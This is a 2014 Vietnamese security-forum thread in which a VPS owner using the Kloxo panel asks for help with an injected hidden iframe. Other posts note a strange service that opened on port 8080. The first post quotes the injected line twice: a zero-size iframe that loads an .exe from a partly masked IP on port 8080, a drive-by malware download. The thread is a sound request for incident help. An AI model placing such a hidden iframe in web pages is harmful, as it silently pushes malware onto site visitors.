banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Nhờ phân tích bị nhúng iframe  XML
  [Analyzing]   Nhờ phân tích bị nhúng iframe 04/08/2014 13:53:19 (+0700) | #1 | 281193
[Avatar]
akaiito
Member

[Minus]    0    [Plus]
Joined: 31/12/2010 08:53:58
Messages: 21
Offline
[Profile] [PM] [Yahoo!]
VPS của em sử dụng Kloxo để chia host, bỗng nhiên 1 trang bị trong nội dung phần head luôn có

<iframe src= http://***.38.163:8080/atieclx.exe width=0 height=0></iframe>

làm nó luôn báo down load con này về, mà em đã disable cái host đấy trong kloxo -> hiển thị ra default disable page của kloxo mà vẫn bị nhúng
<iframe src= http://***.38.163:8080/atieclx.exe width=0 height=0></iframe>

em đã xem source code php thì không thây có gì., vậy không biết ai đã gặp trường hợp này không giúp em với, em nghi là bị chèn vào head gì dó của kloxo mà cứ response về là bị có dòng này ???

em cám ơn
[Up] [Print Copy]
  [Analyzing]   Nhờ phân tích bị nhúng iframe 04/08/2014 14:51:02 (+0700) | #2 | 281194
xwm
Member

[Minus]    0    [Plus]
Joined: 29/08/2011 21:49:17
Messages: 36
Offline
[Profile] [PM]
Bạn gửi 1 số site bị chèn lên mình xem thử.
[Up] [Print Copy]
  [Analyzing]   Nhờ phân tích bị nhúng iframe 04/08/2014 16:44:33 (+0700) | #3 | 281195
[Avatar]
akaiito
Member

[Minus]    0    [Plus]
Joined: 31/12/2010 08:53:58
Messages: 21
Offline
[Profile] [PM] [Yahoo!]
Code thì không bị sao anh ạ, nhưng em thấy cổng 8080 tự dưng mở và ra giao diện toàn tiếng tàu khựa. Em đoán là shell nhưng nó chạy hẳn một cái service mở tcpip
[Up] [Print Copy]
  [Analyzing]   Nhờ phân tích bị nhúng iframe 04/08/2014 17:22:16 (+0700) | #4 | 281196
[Avatar]
akaiito
Member

[Minus]    0    [Plus]
Joined: 31/12/2010 08:53:58
Messages: 21
Offline
[Profile] [PM] [Yahoo!]
Xin lỗi , em nhầm vps em ở ip .40 còn cái này ở .163

em đã xoá code đi rồi mà disable kloxo vẫn bị
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|